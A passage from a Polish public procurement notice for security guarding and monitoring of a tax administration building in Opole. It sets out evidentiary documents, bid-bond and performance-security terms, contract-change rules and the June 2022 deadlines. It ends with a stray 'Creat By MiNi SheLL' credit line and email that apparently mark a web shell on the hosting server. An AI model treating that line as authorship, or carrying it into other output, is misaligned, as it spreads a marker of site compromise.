tytułem środka karnego, sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem.<br/>2)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>3)	oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej. Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej stanowi Załącznik 10 do SWZ;<br/>4)	oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, na potwierdzenie braku podstaw do wykluczenia w zakresie:<br/>a)	art. 108 ust. 1 pkt 3 ustawy Pzp,<br/>b)	art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>c)	art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>d)	art. 108 ust. 1 pkt 6 ustawy Pzp,<br/>e)	art. 109 ust. 1 pkt 8, 9, 10 ustawy Pzp,<br/>f)	art. 7 ust. 1 pkt 1-3 ustawy z dnia 13 kwietnia 2022r o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022r. poz. 835).<br/>Oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp na potwierdzenie braku podstaw do wykluczenia stanowi Załącznik 11 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe na potwierdzenie spełniania warunków udziału w postępowaniu opisane zostały w Rozdziale 20 SWZ.<br/>1.	Na wezwanie Zamawiającego, Wykonawca, którego oferta została najwyżej oceniona, jest zobowiązany do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia podmiotowych środków dowodowych w celu potwierdzenia spełnienia warunków udziału w postępowaniu.<br/>2.	W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu Zamawiający żąda:<br/>1)	uprawnienia do prowadzenia działalności gospodarczej w zakresie usług ochrony mienia realizowanej w formie bezpośredniej ochrony fizycznej – koncesji, o której mowa w art. 15 ust. 1 ustawie o ochronie osób i mienia;<br/>2)	ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;<br/>3)	wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych w zakresie niezbędnym do wykazania spełnienia warunku doświadczenia w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których zamówienia zostały wykonane, oraz załączeniem dowodów określających czy te zamówienia zostały wykonane lub są wykonywane należycie. Wykaz usług stanowi Załącznik 8 do SWZ.<br/>Uwaga: Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego zamówienia były wykonywane lub są wykonywane. Jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty. W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>4)	oświadczenia na temat wykształcenia i kwalifikacji zawodowych Wykonawcy lub kadry kierowniczej Wykonawcy. Oświadczenie o posiadaniu/dysponowaniu grupą interwencyjną i osobami zdolnymi do wykonania zamówienia stanowi Załącznik 9 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający żąda wniesienia wadium w kwocie 3 000,00 zł (słownie: trzy tysiące złotych 00/100)<br/>2.	Zgodnie z art. 97 ust. 7 pkt 2-4 ustawy Pzp wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2020 r. poz. 299 z póżn. zm.).<br/>5.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Izby Administracji Skarbowej w Opolu:<br/>nr 20 1010 1401 0013 3913 9120 0000 z dopiskiem: „Wadium – Świadczenie kompleksowej usługi ochrony fizycznej oraz monitoringu obiektu IAS w Opolu oraz II US w Opolu w budynku przy ul. Witolda Pileckiego 2 w Opolu. Znak sprawy: 1601-ILZ.260.28.2022” <br/>6.	Wniesienie wadium w pieniądzu przelewem na rachunek bankowy wskazany przez Zamawiającego będzie skuteczne z chwilą uznania tego rachunku bankowego kwotą wadium (jeżeli wpływ środków pieniężnych na rachunek bankowy wskazany przez Zamawiającego nastąpi przed upływem terminu składania ofert).<br/>7.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2-4 ustawy Pzp, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>8.	W przypadku wadium wniesionego w pieniądzu oraz z treści gwarancji i poręczeń, o których mowa w art. 97 ust. 7 pkt 2-4 ustawy Pzp, jeżeli wadium będzie wniesione w tych formach, musi wynikać, że wadium zabezpiecza ofertę Wykonawcy złożoną w postępowaniu o udzielenie zamówienia publicznego - „Wadium – Świadczenie kompleksowej usługi ochrony fizycznej oraz monitoringu obiektu IAS w Opolu oraz II US w Opolu w budynku przy ul. Witolda Pileckiego 2 w Opolu. Znak sprawy: 1601-ILZ.260.28.2022”<br/>9.	Za zgodą Zamawiającego Wykonawca może dokonać zmiany formy wadium na jedną lub kilka form, o których mowa w art. 97 ust. 7 pkt 2-4 ustawy Pzp. Zmiana formy wadium musi być dokonana z zachowaniem ciągłości zabezpieczenia oferty kwotą wadium. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Zabezpieczenie ustala się w wysokości nieprzekraczającej 5% ceny całkowitej podanej w ofercie.<br/>2.	Zgodnie z art. 450 ust. 1 ustawy Pzp, zabezpieczenie może być wnoszone, według wyboru Wykonawcy, w jednej lub w kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;<br/>3)	gwarancjach bankowych<br/>4)	gwarancjach ubezpieczeniowych;<br/>5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości.<br/>3.	Zamawiający nie wyraża zgody na wniesienie zabezpieczenia w formach<br/>określonych w art. 450 ust. 2 ustawy Pzp:<br/>1)	w wekslach z poręczeniem wekslowym banku lub spółdzielczej kasy<br/>oszczędnościowo-kredytowej;<br/>2)	przez ustanowienie zastawu na papierach wartościowych emitowanych przez Skarb Państwa lub jednostkę samorządu terytorialnego;<br/>3)	przez ustanowienie zastawu rejestrowego na zasadach określonych w ustawie z dnia 6 grudnia 1996 r. o zastawie rejestrowym i rejestrze zastawów.<br/>4.	Zabezpieczenie wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy Izby Administracji Skarbowej w Opolu nr 20 1010 1401 0013 3913 9120 0000 z dopiskiem: „ZNWU – Ochrona IAS w Opolu i II US w Opolu ul. Witolda Pileckiego 2”. Wniesienie zabezpieczenia należytego wykonania umowy w pieniądzu przelewem na rachunek bankowy wskazany przez Zamawiającego będzie skuteczne z chwilą uznania tego rachunku bankowego kwotą zabezpieczenia (wpływ środków pieniężnych na<br/>rachunek bankowy wskazany przez Zamawiającego musi nastąpić przed podpisaniem umowy w sprawie zamówienia publicznego).<br/>5.	W przypadku wniesienia wadium w pieniądzu Wykonawca może wyrazić zgodę na zaliczenie kwoty wadium na poczet zabezpieczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany. <br/>2.	Zamawiający przewiduje na podstawie art. 455 ust. 1 pkt 1 ustawy Pzp możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru najkorzystniejszej oferty w przypadku wystąpienia niżej wymienionych okoliczności lub zaistnienia niżej wymienionych warunków:<br/>1)	zmiany terminu i/lub wynagrodzenia, gdy wystąpi konieczność wykonania robót zamiennych, dodatkowych lub innych robót niezbędnych do wykonania przedmiotu umowy;<br/>2)	zmiany powszechnie obowiązujących przepisów prawa lub wynikających z prawomocnych orzeczeń lub ostatecznych aktów administracyjnych właściwych organów – w takim zakresie, w jakim będzie to niezbędne w celu dostosowania postanowień umowy do zaistniałego stanu prawnego lub faktycznego;<br/>3)	zmiany terminu realizacji umowy na skutek okoliczności spowodowanych siłą wyższą, uniemożliwiającą wykonanie przedmiotu umowy zgodnie z jej postanowieniami;<br/>4)	zmiany terminu wykonania umowy z przyczyn leżących po stronie Zamawiającego, na które Zamawiający nie ma wpływu, a które to przyczyny mają bezpośredni wpływ na terminowość realizacji przedmiotu umowy;<br/>5)	w każdym przypadku, gdy zmiana jest korzystna dla Zamawiającego, w szczególności, gdy obniży to koszty wykonania przedmiotu umowy.<br/>3.	Dopuszczalne są zmiany ceny w przypadku zmiany stawki podatku od towarów i usług (VAT), za zgodą Zamawiającego wyrażoną na piśmie, jeżeli te zmiany będą miały wpływ na koszty wykonania umowy przez Wykonawcę.<br/>4.	Dopuszczalna jest możliwość zmiany wynagrodzenia w przypadku opisanym w ust. 2 pkt 1, z zastrzeżeniem, iż w odniesieniu do robót dodatkowych stosuje się limit zwiększenia wynagrodzenia, określony w art. 455 ust. 2 ustawy Pzp. <br/>5.	Wszelkie zmiany i uzupełnienia umowy wymagają zgody obu Stron i zachowania formy pisemnej pod rygorem nieważności.<br/>6.	Strona, która zgłosiła propozycje zmiany umowy zobowiązana jest do przedstawienia uzasadnienia faktycznego i prawego zasadności zmiany umowy oraz wykazania okoliczności stanowiących podstawę zmiany, w tym przedstawienia dowodów.<br/>7.	W razie wątpliwości, przyjmuje się, że nie stanowią zmiany umowy następujące zmiany:<br/>1)	danych związanych z obsługą administracyjno-organizacyjną umowy;<br/>2)	danych osób odpowiedzialnych za realizację umowy;<br/>3)	danych teleadresowych;<br/>4)	danych rejestrowych;<br/>5)	będące następstwem sukcesji uniwersalnej po jednej ze stron umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-28 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">miniPortal</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-28 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-27</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com